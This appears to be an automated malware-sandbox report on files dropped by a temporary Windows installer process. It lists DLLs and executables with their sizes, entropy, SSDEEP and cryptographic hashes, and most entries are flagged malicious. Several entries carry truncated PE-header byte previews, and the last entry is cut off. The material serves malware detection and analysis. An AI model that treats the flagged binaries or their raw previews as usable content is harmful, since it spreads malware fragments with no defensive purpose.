                                                                                                                                                                                                                                        SHA-512:03147A59EE35FB3D2752D4C40741A39674CCD4474A575746BC574D2B2FAE1FD04F5AB9C2E02B0DC6268FC6AEE8FBB46DC4BF5FF23B5FCC4A0E9B847F57CA79D0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):308624
                                                                                                                                                                                                                                        Entropy (8bit):6.413892452925429
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:7Txyvl7lz0d6XtdxlHV3fsLvCfohMj1SJbxf:7dyvlV0cxv3ckoQoNxf
                                                                                                                                                                                                                                        MD5:DFA7ABA0155B6D01B1469AFFD7EF2517
                                                                                                                                                                                                                                        SHA1:FDCCEFBA3F59E8A135E2CD9ABDCBC091192F0AA0
                                                                                                                                                                                                                                        SHA-256:A4D60D7C86253D4680BDFCA014E64DB34090850B5CEBD5C032E5A63A484C7CD6
                                                                                                                                                                                                                                        SHA-512:5A2533CEFE2D3F930C7434BF40E271DCC6711066030F03E4F9E53E7F095160BB0B60259401333E21DEACAD9F3DD1063F005906D4B15A933E1A5388A20B98F64C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1243120
                                                                                                                                                                                                                                        Entropy (8bit):6.352658342244649
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:xO2knvJZKtd04kMCZZGiCS2BULn64WYdyczxJlH:xO2knvJZIgMCqonlrDH
                                                                                                                                                                                                                                        MD5:03C6C0A60C0D3E7FA86B4388F4CBCCB6
                                                                                                                                                                                                                                        SHA1:CDDAA47FD8C1A7DE32C2376F27EDCFC594E92074
                                                                                                                                                                                                                                        SHA-256:0B58E5E79DF13110A8258F14D7B3658D1DD0C8DDDC337A164B89D4AC12A0638F
                                                                                                                                                                                                                                        SHA-512:A297DB87EE1055190580AD2BC539E89E38729DCB9EA9075DC535B05CB45C62F1B0FC99D8866047383CF519D7DDE4016CC4EE0D5796190635AEB3D5C2F5E7CD2B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2882984
                                                                                                                                                                                                                                        Entropy (8bit):6.464362146605485
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:4X4pQqWJOvXpPF875+6d6YWkysU0z0JqeWPfSWGBJGSjS:W4pQqWJ0875/WkysUUjPfSi
                                                                                                                                                                                                                                        MD5:C6B57BC6559F86B3E34D8AB0FBB628D5
                                                                                                                                                                                                                                        SHA1:654918FA140BB94E8D319157D610998542AA307D
                                                                                                                                                                                                                                        SHA-256:4D46E343E004C470EFE28B81AA1E8F9F27B2C730790C7DA3053EE0DC412C26FF
                                                                                                                                                                                                                                        SHA-512:DA2564682AA94B57B9A6F39A8236754311155000A545443BBBDD5EAB76E5027FCA1D69145C063001694F58885E1E5D1879DFC86741830270578CB2D36658B891
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):316304
                                                                                                                                                                                                                                        Entropy (8bit):6.336244135441085
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:0ofvIGt5PXBbbpIeDAgWU6or1SWIb2oh+mEFSjHp:TIebbye8gWRMIKosmFp
                                                                                                                                                                                                                                        MD5:6B03FCC62387FC2107801EC86D8CB2F9
                                                                                                                                                                                                                                        SHA1:FCCD3492E7225BE0CA8AA485D94995D3B1B979C2
                                                                                                                                                                                                                                        SHA-256:3D4A8CD51FCA82BD7B3AE9710690EACA11FB0D6270142A7FCD6E89EF7DA7AE96
                                                                                                                                                                                                                                        SHA-512:EC93BADF11F218893AF6FA1064C4C593A5C28CE1A0B59FB344AAC7731C55766AA66579890DE6C4D074D4A27DFB80E0BD69D1B99F05BA35EAD44E3626FEB3E87B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........4.D.Z,D.Z,D.Z,!.Y-N.Z,!.^-V.Z,!._-..Z,..Y-M.Z,!.\-E.Z,.._-q.Z,..^-d.Z,!.[-I.Z,D.[,..Z,.S-C.Z,.Z-E.Z,.,E.Z,D..,E.Z,.X-E.Z,RichD.Z,........................PE..d......b.........." ................................................................._....`..........................................b..X....c..x...............$*......./..............p............................................................................text...>........................... ..`.rdata...n.......p..................@..@.data...$(...p.......V..............@....pdata..$*.......,...h..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):308624
                                                                                                                                                                                                                                        Entropy (8bit):6.410929829905318
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:EfWg7a1lD1u6Xddxlnl3fsLvwzohMpXQ3tnIU:Eeg7aj1Dxf3cKoKgBIU
                                                                                                                                                                                                                                        MD5:EA3DEEFB8C59AD0A93F03E9E996D92B2
                                                                                                                                                                                                                                        SHA1:920B502E52EEC9B2002B86539DB6B7DB64E706B2
                                                                                                                                                                                                                                        SHA-256:A1697FEAAE8B0B5306E23A6D9DDB1FB337F479434573DE002E5818AB7412C568
                                                                                                                                                                                                                                        SHA-512:1B942414CA3B46B8E9399D84094432D2A2F89D2467554AE06433CFC9FCA273A804BDFC1BF6067DEB941651A4CB115B9DD7FEDF24EA416579C15712440EB024C2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1k.*u..yu..yu..yaa.x...yaa.xf..yaa.x...y'..xe..y'..x...yaa.xt..y'..x1..yaa.xx..yu..y...y...xs..y...xt..y...yt..y...xt..yRichu..y................PE..d...h..b.........." ................4................................................s....`..........................................?..`...p?..x................*......./..........p...p...............................8............................................text...n........................... ..`.rdata...;.......<..................@..@.data....'...P.......:..............@....pdata...*.......,...L..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............|..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):27536
                                                                                                                                                                                                                                        Entropy (8bit):6.7311768831441015
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:wmsg2cM28YFcc9qltpD5+b0pHyYiYa2vCQcAMxkE7:wR7YFJqpIbSHy7Ve6xv
                                                                                                                                                                                                                                        MD5:9BE19993A9A1EC0FAFD72C974F75CA8F
                                                                                                                                                                                                                                        SHA1:0CADF3357CFEBBB10997C8B113A9D7A4E82FECE8
                                                                                                                                                                                                                                        SHA-256:A7037919282076F0DB53627154BCE3F5E787EA16C760FECCA00A5B0614F16121
                                                                                                                                                                                                                                        SHA-512:587B3D31CFF0E7D282136574A9EE5AC687DBEA3997455BC449AF4A24DD7C73EB82813BE3CCF4E6B2BC41360E03F79383972D182DFCF64E783440F622DF01A274
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........%.v.D.%.D.%.D.%R..%.D.%...%.D.%..'%.D.%..&%.D.%...%.D.%:..%.D.%.D.%.D.%:.&%.D.%:..%.D.%...%.D.%:..%.D.%Rich.D.%........PE..L.....*f...........!..... ...".......%.......0...........................................@..........................7..y...,8.......p..P............B...).......... 1..8............................3..@............0...............................text............ .................. ..`.rdata.......0.......$..............@..@.data........P.......6..............@....qtmetad.....`.......8..............@..P.rsrc...P....p.......:..............@..@.reloc...............>..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):368520
                                                                                                                                                                                                                                        Entropy (8bit):5.930673554971986
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:tUheTc27502HNoekbDhKirPrppRQfbL8ysiZQM:tUheTc2FZ0DkirPbRQl
                                                                                                                                                                                                                                        MD5:F8D78FFA9E4600984086B07C2C04C832
                                                                                                                                                                                                                                        SHA1:9C46C68E5F622E610292AD78D4F7A7CF2FB9E7EC
                                                                                                                                                                                                                                        SHA-256:2ECCA6B05A516090D3E97558ACCA7B89D908E34B7DD5B79DDEF74E6A8CBDE5B7
                                                                                                                                                                                                                                        SHA-512:FEFA25C3869105C36D26FAF1422E3CEF2535B0B34BA995BF6F63360ED61746A98B5D30345064850D89C458EA73F4A252D4E9591B0321BB3E6C5F79C8AEAFD47A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....sx`.........." ..0..r...........F... ........... ..............................\x....`..................................F..O....................|...#..........`E............................................... ............... ..H............text...@q... ...r.................. ..`.rsrc................t..............@..@.reloc...............z..............@..B.................F......H...........4....................D........................................()...*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*.0..'..........(*...-..+...(+......(,...s-...}....*..{....*..0..'..........(*...-..+...(+......(,...s-...}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*....0..;........(....(....,,.(....(....,..(.......(*...-..(.......(*...*.*Jr...p.(.....(/...*F.(....,...(.....*
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):208880
                                                                                                                                                                                                                                        Entropy (8bit):6.379249042293217
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:sdByij0ih9GM4lttKrjH1Nhpdw8yDsdKB6Jxy/UaUn+hV:+ByionMKEpdSsNxyMaUn8V
                                                                                                                                                                                                                                        MD5:CCFDDF94281FFAD70EE2D26BB77F8B1C
                                                                                                                                                                                                                                        SHA1:6861A4B16AC5AB05FF594E50D8D63579DAB1D969
                                                                                                                                                                                                                                        SHA-256:9CA14F8D46C25C7C5BE2FFBD070231859906204A775E8B8B3F762630EFD5F721
                                                                                                                                                                                                                                        SHA-512:4BD2D0BA6E3CEF76DE2A0E09D8AD1B27C8D00E55744EC25F37BEF1E4E5E8723468054D1B8C719AB2318BDDA342639447F138995A9BE22FD8C5AF71EECE953BB2
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........k...k...k.......k.l.j...k...j...k.l.n...k.l.o...k.l.h...k.!.j...k...j...k.!.n...k.!.k...k.!.....k.......k.!.i...k.Rich..k.........PE..d...T._.........." .........D......d........................................`............`.........................................pN...m......x....@...........'...........P..(.......T.......................(...p...0............................................text............................... ..`.rdata..............................@..@.data...8...........................@....pdata...'.......(..................@..@.rsrc........@......................@..@.reloc..(....P......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):663000
                                                                                                                                                                                                                                        Entropy (8bit):5.94538238272737
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:WG86nitqrIT6Eqk56i258EJsUQUUJ9LBHd2U+:H7itqr3e6d18J9LBHd2F
                                                                                                                                                                                                                                        MD5:4A2FC86ED202B5E7378A7B84F947B2F1
                                                                                                                                                                                                                                        SHA1:6888E73A57D0C999725D57F68E9E16A6F729294F
                                                                                                                                                                                                                                        SHA-256:60605ED6CEFD158EDE7B6B2C2C6804765E8E5EFF602F232F337759C3D5DFD52B
                                                                                                                                                                                                                                        SHA-512:E0FDE10265310D607519FB13FE7114B50E6160487AC0164393E78DD8346FF0BEBDEF9476166A4DB7CB86EEAE44A501F2372DD3AB5EF103323ACB9CD1C02710F8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....X.........." ..0.............^.... ... ....... .......................`............`.....................................O.... ..`................)...@....................................................... ............... ..H............text........ ...................... ..`.rsrc...`.... ......................@..@.reloc.......@......................@..B................@.......H.......Th..................X...T.........................................{....*"..}....*..($...*:.($.....}....*"..(%...*..(....*..{ ...*"..} ...*..{!...*"..}!...*..{"...*"..}"...*..{#...*"..}#...*..{$...*"..}$...*..{*...*>..}*.....(....*..{+...*>..}+.....(....*..{%...*"..}%...*..0...........{&......(....-..*..(....*6..s....}&...*.0...........{'......(....-..*..(....*6..s....}'...*.0...........{(......(....-..*..(....*6..s....}(...*.0...........{)......(....-..*..(....*6..s..
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):98224
                                                                                                                                                                                                                                        Entropy (8bit):6.452201564717313
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
                                                                                                                                                                                                                                        MD5:F34EB034AA4A9735218686590CBA2E8B
                                                                                                                                                                                                                                        SHA1:2BC20ACDCB201676B77A66FA7EC6B53FA2644713
                                                                                                                                                                                                                                        SHA-256:9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
                                                                                                                                                                                                                                        SHA-512:D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):91024
                                                                                                                                                                                                                                        Entropy (8bit):6.390274185816327
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:JwHNL+3gkqDIECSiSx7ZMAxV421OaPo7Wc3+OZuRfcuK840hw/73AF:yHNL+wk4tBHPo7Wc3+oMfdK84sw/0F
                                                                                                                                                                                                                                        MD5:CF692DD1E4AFA29D6499D1818CA2B6B0
                                                                                                                                                                                                                                        SHA1:7B4E50F82F242EFD817A7C91FAB2600F2A1C57C0
                                                                                                                                                                                                                                        SHA-256:814DB4C14F26B6D7307B99F045B280D1D81E8815EE77E85A2583C710D18890D1
                                                                                                                                                                                                                                        SHA-512:9CF9387A336113523CEB9E87B4C3BB551CE8CE3D15BB2EADF9A2901025E50969DB92A6DA6AD5CC79B394078385BEB186BC26A2B025327CA781AA16F03E4517D8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^...^...^...&|..^...5...^..+...^..+...^..+...^..+...^...5...^...^..R^..6+...^..6+...^..6+...^..6+...^..Rich.^..........................PE..d......b.........." .........l...............................................p............`.............................................P.......,....P.......@..H....4.../...`......0...p...............................8...............X............................text............................... ..`.rdata...K.......L..................@..@.data...8....0......................@....pdata..H....@....... ..............@..@.rsrc........P.......0..............@..@.reloc.......`.......2..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):305552
                                                                                                                                                                                                                                        Entropy (8bit):6.4083242939173815
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:/YjMr0NcUTrHglzwsGqSqosoh/1iZX2ZIR:QjMrWcw0yXqNoT4+IR
                                                                                                                                                                                                                                        MD5:66AD0E987BADD3C3809E012EEF10E246
                                                                                                                                                                                                                                        SHA1:F01A159E82366F127C88A26697416EB8C048AB8F
                                                                                                                                                                                                                                        SHA-256:848E341FD8859CAF431B1B1571AF0D84F07576CDF07298DA93CE9AD98064B03A
                                                                                                                                                                                                                                        SHA-512:87BFEBD0CC8B76BE541DD0838713A10960EFD9FE8AD83B9D54DBCDB9E0655A0F2976759465B8D91B8F9FD0DBA3E4A488F66F970101C5AA66923F1E29E6DE7DD2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............^...^...^..._...^..._}..^..._...^..._...^..._...^..._...^..._...^...^b..^#.._...^#.._...^#.G^...^#.._...^Rich...^................PE..d......b.........." ................................................................5.....`..........................................:..L...<;..d...............<*...z.../..............p...........................P...8...............p............................text............................... ..`.rdata...7.......8..................@..@.data...t'...P......................@....pdata..<*.......,...@..............@..@_RDATA...............l..............@..@.rsrc................n..............@..@.reloc...............p..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):416104
                                                                                                                                                                                                                                        Entropy (8bit):6.435477544411637
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:dMdhFRZYRiV2M05ku9aIRErBCn15rltdSv20zSUu6g3ohXgJAzsGJv6Zj:Sdh7ZoE2h5ku9aiEE15rHEru33o9SQKj
                                                                                                                                                                                                                                        MD5:8718D431F53F2E0426C023654BDA4DAD
                                                                                                                                                                                                                                        SHA1:EC926473285E520F94558B1CBF39EA705A7B9E2D
                                                                                                                                                                                                                                        SHA-256:CB142B6C81E80DFD5FC75627B305A4A7AEB22061550F6A3AF24A6767EAA29305
                                                                                                                                                                                                                                        SHA-512:1F3F4061152B03674D14EFB9C58D84B86F1B88891B9F0A288FE46D0EE9EEDCA2F29328170CADDABF37E695A644FDDDDF5FDDA503B9424E71EFB92867F07581CD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t.............m......m..^....`......`......`.......m......m........S...^`.....^`.....^`.....^`.....Rich............PE..d...J..e.........." .....<..........\...............................................2g....`.........................................P...........x....`...........:...*..h/...p..p....]..p...................._..(...0^..8............P..P............................text....:.......<.................. ..`.rdata.......P.......@..............@..@.data....-..........................@....pdata...:.......<..................@..@_RDATA.......P......................@..@.rsrc........`......................@..@.reloc..p....p......................@..B........................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):204192
                                                                                                                                                                                                                                        Entropy (8bit):6.237429214447198
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:HzS560/yk/J3HssPqqGLgl+zX3FKZzSzvG7mH28dZOjc/2r6MqRo9HYzsQb5878:HqJ3HssPqqGLgl+zXkZzt84a84
                                                                                                                                                                                                                                        MD5:DA9015DF320DCC2EDDEE493E20F639BA
                                                                                                                                                                                                                                        SHA1:5732E5722D2CB5A668ABC19AED6434852D0A4FC8
                                                                                                                                                                                                                                        SHA-256:2294EBB89E749E7145628164913251B563EA6641A6CD1AE03FBCE55DA43F9B17
                                                                                                                                                                                                                                        SHA-512:AF2C0E28966537842817174146DEDEA93A00BDBACF97FFAAECE878E3191D3719BF9A2B1618AB645CB68D2039B4EB16524B309A2BF0D76DDCA6AE09708CD2CBFA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.\.........." ..0......".......... .........a. ....................................`.................................r...O........................_.......................................................... ............... ..H............text....... ...................... ..`.rsrc............ ..................@..@.reloc..............................@..B........................H.......8...0...........h...x............................................((...*.0..-.......~P...- r...p.....()...o*...s+......P...~P...*.~Q...*...Q...*V(....r'..p~Q...o,...*V(....re..p~Q...o,...*V(....r...p~Q...o,...*V(....r...p~Q...o,...*V(....rA..p~Q...o,...*V(....r...p~Q...o,...*V(....r...p~Q...o,...*V(....r%..p~Q...o,...*V(....re..p~Q...o,...*V(....r...p~Q...o,...*V(....r...p~Q...o,...*V(....r!..p~Q...o,...*V(....rW..p~Q...o,...*V(....r...p~Q...o,...*V(....r...p~Q...o,..
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6023664
                                                                                                                                                                                                                                        Entropy (8bit):6.768988071491288
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:hcirJylHYab/6bMJsv6tWKFdu9CLiZxqfg8gwf:+irJylHFb/QMJsv6tWKFdu9CL4xqfg8x
                                                                                                                                                                                                                                        MD5:817520432A42EFA345B2D97F5C24510E
                                                                                                                                                                                                                                        SHA1:FEA7B9C61569D7E76AF5EFFD726B7FF6147961E5
                                                                                                                                                                                                                                        SHA-256:8D2FF4CE9096DDCCC4F4CD62C2E41FC854CFD1B0D6E8D296645A7F5FD4AE565A
                                                                                                                                                                                                                                        SHA-512:8673B26EC5421FCE8E23ADF720DE5690673BB4CE6116CB44EBCC61BBBEF12C0AD286DFD675EDBED5D8D000EFD7609C81AAE4533180CF4EC9CD5316E7028F7441
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......D.............................UJ......................................................W.....,..................r....................Rich............PE..d...;._.........." ..........-.......-......................................`\.....x.\...`...........................................L..O....T...... \.......U.. ....[......0\..%..,.H.T.....................H.(.....H.0............./.H............................text............................... ..`.rdata..F7%.../..8%.................@..@.data...x....PT..\...6T.............@....pdata... ....U.."....T.............@..@.qtmimed.....0W.......V.............@..P.rsrc........ \.......[.............@..@.reloc...%...0\..&....[.............@..B........................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1125776
                                                                                                                                                                                                                                        Entropy (8bit):6.4092046609596345
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:IrAq6D1711KHSPJuxXG4WyvHA2hU3TZlHMHE7GHGHS+HgH/HoHsH5Wr6Pq7Gsjet:IrAq6D1711KHSPwx24WyvHA2hU3TZlHM
                                                                                                                                                                                                                                        MD5:A3A691724ED0DE2B86261B67AAB1C8D5
                                                                                                                                                                                                                                        SHA1:AC7EC2AFA40930B947B4838B7FC03C5A12B6A573
                                                                                                                                                                                                                                        SHA-256:6F0BAC85CEFC7B4223750418A4EF3CFD6F874433DB4A8C1A0DC1651BB6395E88
                                                                                                                                                                                                                                        SHA-512:938C249E329FA6EE7923CA4563F6E11C24133093EA5E73FF2FDD3BC073AA82B407D9CD0828A4F7B1D31ADEDDEFB375651C3E429078A2735717FFA25E0A157ECB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L......^...........!.....@...................P....@.................................;................................ ..j.......m*...0...................G...........................................................................................text....@.......:.................. ..`.data........P.......@..............@....tls.................8..............@....idata...0.......,...:..............@..@.edata....... .......f..............@..@.rsrc........0.......j..............@..@
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):91024
                                                                                                                                                                                                                                        Entropy (8bit):6.392900904102728
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:hmtFJlpHwE3mKEUs7Z5YxPwlQOaYU7jw52/xPuiXC/8K8jcYa1o/7kIf:hmtFzpF2AHYU7jw52/xGiXC0K8Qx+/Xf
                                                                                                                                                                                                                                        MD5:419F5B0AD8C7A997FF45B0E78B8EB992
                                                                                                                                                                                                                                        SHA1:93785EF8A6CB10746843728933A41178D5C880C7
                                                                                                                                                                                                                                        SHA-256:899C543564E34D7796148F5E57D727879D180444CB193647C5BB0C6A009B46A0
                                                                                                                                                                                                                                        SHA-512:5E5336BCC2BAEC98551AE64B32EF89CFC68FF4B64A5802529E58120D3E682C8AD64426F1DA92838A1CFCC050C6B071D14A8C6723E0A4FAFD6DC8F6E46B93A683
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^...^...^...&|..^...5...^..+...^..+...^..+...^..+...^...5...^...^..R^..6+...^..6+...^..6+...^..6+...^..Rich.^..........................PE..d......b.........." .........l...............................................p............`.............................................\...,...,....P.......@..H....4.../...`......0...p...............................8...............X............................text............................... ..`.rdata...K.......L..................@..@.data...8....0......................@....pdata..H....@....... ..............@..@.rsrc........P.......0..............@..@.reloc.......`.......2..............@..B................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):1667544
Entropy (8bit):5.96495732757551
Encrypted:false
SSDEEP:49152:/cXMn2kbBdCEtvrPJIs4RbYI3kirPbRQe3e6d18bBHdC:/cc2k7pS
MD5:43B71C0A50EAF646CDF3BC7A0672B3E2
SHA1:56CC102402BB5FD86D8E5875050AFB7C71A6090D
